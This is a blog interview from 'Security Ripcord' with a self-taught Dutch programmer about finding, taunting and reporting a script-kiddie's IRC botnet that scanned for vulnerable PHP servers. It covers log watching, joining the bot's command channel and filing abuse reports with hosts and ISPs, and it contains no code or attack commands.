Security Ripcord

As I stated in a previous post, I have been paying a little more attention to the information provided in URI and Refer sections provided by one of my WordPress plugins. This information has, at times, contained information about some systems on the Internet that are searching for other systems with vulnerable PHP installations and applications. As I mentioned in the original post I found a blog where another blogger had already analyzed the scripts that I found on a hacked server, which was scanning my web server. The blog is B10[m|g] and the blogger goes by the pseudonym B10m.

After reading another post where B10m confronted a script-kiddie botnet runner with the cracker name “fazanul,” I decided that I would ask B10m to be my first blog interview. He agreed. The following contains my questions and his answers. As you will see, B10m is not a security professional. Rather, he is a software programmer. Because of his interest and investigation into the IRC bot that queried his system, I assumed that he was a security professional or had close ties to them. The majority of my questions take that misconception and run with it. However, B10m was a good sport and answered each question he was able.

I think it is a good sign that a software programmer decided to take action when he was presented with malicious activity. I would not suggest everybody try to connect to the command and control channels of botnets they locate unless they have experience in the field of malware analysis. Fortunately, B10m did know how to protect himself and his systems to a certain extent but, as he mentions during the interview, he has accepted a certain amount of risk associated with his actions. My recommendations is that people wanting to make a difference against crackers a simple abuse report to the system owner, the system’s hosting company, and the system’s ISP is probably sufficient.

I would like to thank B10m for agreeing to the interview. I hope you all enjoy.

What made you start blogging? From your site you appear to be living in The Netherlands but you blog in English. Is there any particular reason?

I’ve started blogging quite some time ago on my own hacked up Perl
blogging system. When I found out other people build better systems,
I used that. I was forced to create my own blog by a friend who -at a
certain point- refused to publish my items any longer…

English just seemed to fit better with my topics (mainly technical
issues). I usually get disappointed when I find a blog post in a
language I don’t master, containing the exact error message, and
most likely a solution, I was searching for

Are you a security professional? What industry do you work in (e.g. government, education, financial, consulting, etc)? What are your primary duties?

Not at all. I’m a software developer (somewhat) and don’t really
have any real security background other than trying to get my apps
to be as secure as possible.

I am going to assume that you do malware analysis either for work or as a hobby. How did you start and what training have you received?

I’m a selftaught geek. Never really had any official training. Just
a lot of reading code will do the trick (besides chatting with
professionals over a few beers). Reading code is fun, and when it’s
supposed to do evil things on my machine, it’s even more fun.

Going after these kiddies isn’t even a hobby though. I just got
obsessed with this fazanul guy. I took a botnet down and rather
quickly, he returned with a new server. So I had to take that down,
and now we’re here. I’m scanning my logfiles for him on a daily base
now. Others do get by, but I pay less attention to them.

If a security professional were going to fly to Europe for one security conference, which would you recommend and why?

I would have no clue. I’m not into those big conferences too much.
So my answer would probably be Prague. Not because of any
conference, but just because it’s an awesome city

What resources do European security professionals look to during their day to day work to keep abreast of breaking news and events (e.g. Alert/Vulnerability Lists, Websites, Blogs)?

I’m not a security professional, so I can only speak for myself. I
of course follow slashdot, subscribed to the CERT Advisory mailing
list (so I can taunt MS Windows-using friends often and look at
digg occasionally.

What training (personal, certification, degrees) would you recommend for persons just starting to look into malware analysis?

No clue, it’s not my job

Obviously many people in Europe are multilingual but not everybody. How do these language barriers affect the security situation in Europe and how information flows and is interpreted?

Language barriers are not really a problem in Europe. Most kids
learn at least 1 foreign language in school. In the Netherlands it
used to be mandatory (still is?) to study English, German and French
for at least one year in highschool. After that, German and French
become optional. English is even being taught by the age of 10 or
so.

I have never ran into an abuse desk that couldn’t communicate in
English though. It’s part of the job. Abuse reports may come from
all over the world… I do notice that people get working faster for
you when you do address them in their native language though.

You have started a conversation with a hacker who refers to him/herself as “fazanul,” why did you start that conversation?
The code he used for his attacks were full of “scriptkiddie” signs.
A real coder has a certain programming style as to indentation, etc.
This was clearly a cut’n'paste job, done by someone with little
knowledge.

I wanted to see how many hosts actually were infected by this guy’s
script, so I logged in, pretending to be a bot myself. He launched
commands at me, which I replied with bogus replies, but looked like
real system replies. That was fun for a while and he bought my
answers up until I really made it ridiculous, like giving answers to
questions he never asked… and of course the “I refuse” answer was
something he didn’t expect from a machine.

I was just messing with this kid and found it quite funny, so I
continued talking to him (he doesn’t want to talk much to me
though…).

You used fazanul’s IRC bot to connect to his command and control channel, what did you do to protect yourself before making that connection?

Not really. I read his code and connected to the IRC channel by
BitchX, a regular IRC client.

What tools would a young security professional want to become familiar with to begin to analyze malware like fazanul’s IRC bot?

It just boils down to being bored and having some time left to waste
on these things. I noticed the script being written in Perl. I’m a
Perl hacker so it caught my attention. After that, it’s basic
networking knowledge. It’s quite important to find out who to contact
about network abuse etc. Just scan your logfiles every now and
then for “weird” activity.

It’d probably help to read a little PHP too though. There’s a lot of
horribly insecure PHP code available online. By being able to read
PHP, you can spot errors in the code and patch it. Afterall, close
to all of these attacks are PHP-script exploits.

Have you noticed any type of DDoS towards your systems and what did you do to protect yourself from fazanul’s repercussions?

Nothing. Since his botnets crumble rather fast I doubt he has the
power to launch a real DDoS attack. If he does, oh well, my poor
little server will suffer and my blog will be inaccessable for a
while. Not that big of a deal. Then again, since this is really a
scriptkiddie without a clue about what he’s doing, I don’t fear this
guy. I fear my buggy harddrive more

You have been contacting system owners and Internet Service Providers to report the systems being used to spread these IRC bots. Please explain how you do this so that others can do the same?

As I stated before, the most important thing is to find out who is
responsible for a box. First you go after the host of these files.
They are usually not aware of this abuse so they are usually helpful
and friendly. After that, I usually look up who’s currently logged
in the IRC channel, find out their IP addresses and lookup the ISPs
belonging to that. I use gwhois[1] for that. These admins are
usually less helpful and friendly (calling my warnings “bogus
claims” and “without logfiles, we won’t do anything” stuff).
Nevertheless, most zombies in the botnet do disappear after my
warnings though.

1. http://freshmeat.net/projects/gwhois/

Go forth and do good things,
Cutaway

B10m, B10m|g, botnet, fanazul, abuse, Security Ripcord

This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported.

You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.